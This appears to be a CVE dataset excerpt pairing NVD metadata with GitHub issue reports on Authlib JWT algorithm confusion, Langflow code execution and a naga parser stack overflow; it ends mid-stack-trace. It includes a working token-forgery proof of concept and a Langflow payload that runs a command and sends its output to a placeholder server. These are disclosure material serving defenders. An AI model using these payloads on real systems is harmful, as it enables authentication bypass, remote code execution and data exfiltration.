[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "matchCriteriaId": "18E429CB-390E-4F80-B36A-83E930FFDC41", "versionEndExcluding": "1.3.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "347" ]
347
https://github.com/lepture/authlib/issues/654
[ "Exploit", "Issue Tracking" ]
github.com
[ "lepture", "authlib" ]
# Issue description If the `algorithm` field is left unspecified when calling `jwt.decode`, the library will allow HMAC verification with ANY asymmetric public key. The library does no checks whatsoever to mitigate this. This applies to verification with the algorithms HS256, HS384, and HS512 in lieu of the asymmetric algorithm. This issue is also persistent in [joserfc](https://github.com/authlib/joserfc). This vulnerability is similar to CVE-2022-29217 and CVE-2024-33663, however severity is higher as this applies to ALL verification with asymmetric public keys, regardless of format. The [Authlib documentation on JWTs](https://docs.authlib.org/en/latest/jose/jwt.html) starts off with a code snippet demonstrating JWT signing and verfication of claims using RSA. The code snippet shown is vulnerable to this issue. The documetation does halfway down the page go on to describe the danger of not checking the algorithm header, however does not adequately press the importance of not doing so, nor does the library implement adequate protections against this. # Proposed solution Same solution as for the patch for CVE-2022-29217 and CVE-2024-33663. A thorough, comprehensive check of whether the verifying key is asymmetric, see [here](https://github.com/jpadilla/pyjwt/blob/7b4bc844b9d4c38a8dbba1e727f963611124dd5b/jwt/utils.py#L100). When performing signature verification with HMAC, first check whether the verifying key is not actually a PEM or SSH-encoded asymmetric public key; this is a clear sign of algorithm confusion. Also make non-usage of the algorithms keyword throw an exception when using the `jwt.decode` method, or at the very least a warning, so that the developer at least knows they are doing something silly by not using it. Alternatively, depricate the method an instead only allow usage of the `JsonWebToken` class, with algorithm as a mandatory parameter and disallow usage of multiple algorithms in a single instance. # Proof-of-Concept Here is a simplified Proof-of-Concept using pycryptodome for key generation that illustrates one way this could be exploited ```py from authlib.jose import jwt from Crypto.PublicKey import RSA from Crypto.Hash import HMAC, SHA256 import base64 # ----- SETUP ----- # generate an asymmetric RSA keypair # !! signing should only be possible with the private key !! KEY = RSA.generate(2048) # PUBLIC KEY, AVAILABLE TO USER # CAN BE RECOVERED THROUGH E.G. PUBKEY RECOVERY WITH TWO SIGNATURES: # https://crypto.stackexchange.com/questions/26188/rsa-public-key-recovery-from-signatures # https://github.com/FlorianPicca/JWT-Key-Recovery PUBKEY = KEY.public_key().export_key(format='PEM') # Sanity check PRIVKEY = KEY.export_key(format='PEM') token = jwt.encode({"alg": "RS256"}, {"pwned":False}, PRIVKEY) claims = jwt.decode(token, PUBKEY) assert not claims["pwned"] # ---- CLIENT SIDE ----- # without knowing the private key, a valid token can be constructed # YIKES!! b64 = lambda x:base64.urlsafe_b64encode(x).replace(b'=',b'') payload = b64(b'{"alg":"HS256"}') + b'.' + b64(b'{"pwned":true}') hasher = HMAC.new(PUBKEY, digestmod=SHA256) hasher.update(payload) evil_token = payload + b'.' + b64(hasher.digest()) print("😈",evil_token) # ---- SERVER SIDE ----- # verify and decode the token using the public key, as is custom # algorithm field is left unspecified # but the library will happily still verify without warning, trusting the user-controlled alg field of the token header data = jwt.decode(evil_token, PUBKEY) if data["pwned"]: print("VULNERABLE") ``` ## Disclaimer As per the security policy, I contacted both the author and Tidelift about this issue in early April of this year. I received a response from Tidelift that they would follow up the issue, however the issue remains unpatched and I have still not heard further from either. As such, I am opening a public issue on this vulnerability.
Algorithm confusion when verifying JSON Web Tokens with asymmetric public keys
https://api.github.com/repos/authlib/authlib/issues/654/comments
5
2024-06-03T13:51:05Z
2024-06-10T16:40:33Z
https://github.com/authlib/authlib/issues/654
2,331,218,331
654
6,060
CVE-2024-37014
2024-06-10T20:15:15.213
Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/langflow-ai/langflow/issues/1973" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/langflow-ai/langflow/issues/1973" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "matchCriteriaId": "32795F99-77E1-46F4-ABBF-53A7616F4777", "versionEndExcluding": null, "versionEndIncluding": "0.6.19", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/langflow-ai/langflow/issues/1973
[ "Exploit", "Issue Tracking" ]
github.com
[ "langflow-ai", "langflow" ]
**Quick note** Langflow is a very interesting and useful framework for those who work with AI projects. Personally, it's a cool project to learn from. It seems the Custom Component feature was launched to support user-defined Python scripts that use the Langflow provided library. This is a great feature. However, upon reviewing its documentation in [1] and [2], it seems there is no mention of potential security issues. Hence, perhaps the following finding was likely not expected. [1] https://docs.langflow.org/components/custom [2] https://docs.langflow.org/guidelines/custom-component **Describe the bug** The Custom Component feature allows users to provide their own Python scripts using the CustomComponent class provided by the Langflow library. This is excellent for local testing and experimentation. However, if the framework is hosted online, it creates a potential security issue where a bad actor can leverage the opportunity to provide arbitrary Python code and gain code execution ability against the hosting server. **Impacted API** POST /api/v1/custom_component **Browser and Version** - Browser: Tested on Chromium - Version: 125.0.6422.60 (Official Build) (arm64) **To Reproduce** Steps to reproduce the behavior: 1. Create a new project 2. Using `CustomComponent`, within `Component` class, provide the following Python function ``` import subprocess import base64 def execute_and_send(): # Execute arbitrary system command result = subprocess.run(['uname', '-a'], capture_output=True, text=True) if result.stderr: print("Error:", result.stderr) return # Base64 encode the output encoded_output = base64.b64encode(result.stdout.encode()).decode() # Make a GET request with the base64 string as a query parameter url = f"https://your_server/?data={encoded_output}" response = requests.get(url) execute_and_send() ``` 3. By clicking on `Check & Save`, the `/api/v1/custom_component` API is invoked to process the provided Python script, which then leads to OS command execution. The output will be Base64 encoded and sent to a malicious server. **Screenshots** <img width="1876" alt="Screenshot 2024-05-25 at 10 43 43 AM" src="https://github.com/langflow-ai/langflow/assets/21222141/ba8afb97-d6fc-444a-82c5-cf78cb1665f6"> **Additional context** The vulnerability allows for arbitrary code execution by injecting malicious code through the Custom Component feature. This could lead to significant security risks, including data theft, unauthorized access, and potential disruption of services (especially when being hosted publicly)
[Security Issue] Code Execution against underlying host system in Custom Component
https://api.github.com/repos/langflow-ai/langflow/issues/1973/comments
8
2024-05-25T15:48:20Z
2024-08-02T19:56:39Z
https://github.com/langflow-ai/langflow/issues/1973
2,317,095,064
1,973
6,061
CVE-2024-36761
2024-06-12T16:15:11.983
naga v0.14.0 was discovered to contain a stack overflow via the component /wgsl/parse/mod.rs.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/MageWeiG/VulnerabilityCollection/blob/main/CVE-2024-36761/info.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gfx-rs/naga/issues/2591" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/MageWeiG/VulnerabilityCollection/blob/main/CVE-2024-36761/info.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gfx-rs/naga/issues/2591" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gfx-rs:naga:0.14.0:*:*:*:*:rust:*:*", "matchCriteriaId": "78CD5E32-2654-480D-99A6-B5B24501BB0D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gfx-rs/naga/issues/2591
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gfx-rs", "naga" ]
When I was using oss-fuzz to test the fuzzer wgsl_parser in my project, I found a stack overflow vulnerability that could trigger a crash by typing enough '(' into the fuzzer. The crash information is as follows: ``` ================================================================= ==132416==ERROR: AddressSanitizer: stack-overflow on address 0x7fffadaa5ee0 (pc 0x555b4f7ab900 bp 0x7fffadaa64f0 sp 0x7fffadaa5ee0 T0) #0 0x555b4f7ab900 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs #1 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33 #2 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #3 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25 #4 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #5 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17 #6 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #7 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9 #8 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49 #9 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #10 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41 #11 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #12 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33 #13 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #14 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25 #15 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #16 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17 #17 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #18 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22 #19 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9 #20 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28 #21 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28 #22 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18 #23 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62 #24 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #25 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41 #26 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #27 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33 #28 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #29 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25 #30 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #31 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17 #32 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #33 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9 #34 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49 #35 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #36 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41 #37 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #38 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33 #39 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #40 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25 #41 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #42 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17 #43 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #44 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22 #45 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9 #46 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28 #47 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28 #48 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18 #49 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62 #50 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #51 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41 #52 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #53 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33 #54 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #55 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25 #56 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #57 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17 #58 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #59 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9 #60 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49 #61 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #62 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41 #63 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #64 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33 #65 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #66 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25 #67 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #68 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17 #69 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #70 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22 #71 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9 #72 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28 #73 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28 #74 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18 #75 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62 #76 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #77 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41 #78 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #79 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33 #80 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #81 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25 #82 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #83 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17 #84 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31 #85 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9 #86 0x555b4f7a5049 in 